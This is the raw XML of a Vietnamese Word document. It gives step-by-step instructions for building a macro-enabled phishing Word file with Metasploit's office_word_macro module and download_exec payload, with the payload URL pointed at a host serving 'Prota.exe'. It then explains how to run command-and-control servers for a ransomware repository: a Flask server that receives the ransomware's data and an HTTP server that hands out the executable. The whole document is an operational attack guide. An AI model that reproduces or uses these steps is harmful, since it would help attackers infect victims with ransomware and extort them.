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8E0B3" w14:textId="727FBE50" w:rsidR="007460D6" w:rsidRDefault="002F136B" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Hướng dẫn tạo file docm phishing và chạy 2c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4E96B" w14:textId="660168F9" w:rsidR="002F136B" w:rsidRDefault="002F136B" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Tạo file docm bằng metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24FD62" w14:textId="7DD1D138" w:rsidR="002F136B" w:rsidRPr="002F136B" w:rsidRDefault="002F136B" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vào </w:t>
      </w:r>
      <w:r w:rsidRPr="002F136B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A9676" w14:textId="7E5CD2BD" w:rsidR="002F136B" w:rsidRPr="002F136B" w:rsidRDefault="002F136B" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chọn </w:t>
      </w:r>
      <w:r w:rsidR="00707B43">
        <w:t>module</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khai thác: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F136B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>use exploit/multi/fileformat/office_word_macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD9003" w14:textId="6582A7C0" w:rsidR="002F136B" w:rsidRDefault="002F136B" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F136B">
        <w:t>set PAYLOAD payload/windows/download_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB37B2" w14:textId="64D0CC25" w:rsidR="002F136B" w:rsidRDefault="00707B43" w:rsidP="002F136B">
      <w:r w:rsidRPr="00707B43">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="700BFE87" wp14:editId="393498E2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>261399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="27063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136B">
        <w:t xml:space="preserve">Dùng lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="002F136B" w:rsidRPr="002F136B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidR="002F136B">
        <w:t xml:space="preserve"> để coi các cài đặt hiện có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09916108" w14:textId="3EB94675" w:rsidR="002F136B" w:rsidRDefault="002F136B" w:rsidP="002F136B"/>
    <w:p w14:paraId="25E697FA" w14:textId="0F7415B0" w:rsidR="002F136B" w:rsidRDefault="002F136B" w:rsidP="002F136B">
      <w:r>
        <w:t>Chú thích các biến trong options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115A4B77" w14:textId="7EB71A08" w:rsidR="00707B43" w:rsidRDefault="00707B43" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các biến của module </w:t>
      </w:r>
      <w:r w:rsidRPr="00707B43">
        <w:t>(exploit/multi/fileformat/office_word_macro)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7370ADE4" w14:textId="666E493E" w:rsidR="002F136B" w:rsidRDefault="00707B43" w:rsidP="00707B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B43">
        <w:t>CUSTOMTEMPLATE</w:t>
      </w:r>
      <w:r>
        <w:t>: đây là biến chứa path đến file custom template, nếu không cần custom thì không cần set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D464B" w14:textId="35CDA5E0" w:rsidR="00707B43" w:rsidRDefault="00707B43" w:rsidP="00707B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B43">
        <w:t>FILENAME</w:t>
      </w:r>
      <w:r>
        <w:t>: đây là biến dùng để đặt tên file .docm khi xuất ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A503F0" w14:textId="3AF01D6F" w:rsidR="00707B43" w:rsidRDefault="00707B43" w:rsidP="002F136B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các biến của payload </w:t>
      </w:r>
      <w:r w:rsidRPr="00707B43">
        <w:t>(windows/download_exec)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A60085" w14:textId="3D92FF0E" w:rsidR="00707B43" w:rsidRDefault="00707B43" w:rsidP="00707B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B43">
        <w:t>EXE</w:t>
      </w:r>
      <w:r w:rsidR="004E2A85">
        <w:t>: đây là biến đặt tên file mã độc khi chạy trên máy victim, có thể custom lại nếu cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CA7F1C" w14:textId="7BC21C17" w:rsidR="00707B43" w:rsidRDefault="00707B43" w:rsidP="00707B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00707B43">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="004E2A85">
        <w:t>: đây là biến chứa link dẫn đến 2c để có thể download được mã độc về victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E221EE" w14:textId="0C29FF21" w:rsidR="004E2A85" w:rsidRDefault="004E2A85" w:rsidP="004E2A85">
      <w:r w:rsidRPr="004E2A85">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Lưu ý: </w:t>
      </w:r>
      <w:r>
        <w:t>Các biến không liệt kê ở trên, không cần thiết để chỉnh hoặc không nên chỉnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05481BB7" w14:textId="5A80ABEC" w:rsidR="004E2A85" w:rsidRDefault="004E2A85" w:rsidP="004E2A85">
      <w:r>
        <w:t>Để set được biến dùng lệnh: set &lt;tên biến&gt; &lt;giá trị&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Ví dụ: set </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2A85">
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0036041A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://172.30.10.10:8080/Prota.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C740754" w14:textId="6B13EA2E" w:rsidR="004E2A85" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chạy 2c cho ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248DC725" w14:textId="4C786F4C" w:rsidR="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:r>
        <w:t xml:space="preserve">Clone repo về server: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="0036041A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/n3r0-b1n4ry/prota_ransom.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43529312" w14:textId="13CD08DD" w:rsidR="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:r>
        <w:t>Mở 2 tab hoặc 2 terminal để chạy 2 server http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9D197" w14:textId="2AA6F12A" w:rsidR="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Server nhận thông tin của ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617EA2F6" w14:textId="214D54DD" w:rsidR="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lệnh chạy: python3 server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC0E06" w14:textId="124DA942" w:rsidR="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lưu ý: nhớ cài Flask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862FCD4" w14:textId="51AD2BD5" w:rsidR="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Server file để download ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B775D2C" w14:textId="22064236" w:rsidR="00DB236F" w:rsidRPr="00DB236F" w:rsidRDefault="00DB236F" w:rsidP="00DB236F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lệnh chạy: python3 -m http.server 8080 –directory ./ --bind 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DB236F" w:rsidRPr="00DB2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0311A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6B4F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64C72"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11A06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76A0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DDC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937792">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="818157515">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1592660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6B"/>
    <w:rsid w:val="002F136B"/>
    <w:rsid w:val="004E2A85"/>
    <w:rsid w:val="00707B43"/>
    <w:rsid w:val="007460D6"/>
    <w:rsid w:val="00DB236F"/>
    <w:rsid w:val="00F4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8F3B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C8575700-9006-4292-85D3-6D81C1833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HPT">
    <w:name w:val="HPT"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F41E5B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</w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr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4F81BD"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:sz w:val="20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cBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        <w:sz w:val="20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F13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1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13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2A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A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3r0-b1n4ry/prota_ransom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2.30.10.10:8080/Prota.ex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Văn Tiến Dũng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nguyễn Văn Tiến Dũng</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-11T17:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-11T17:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>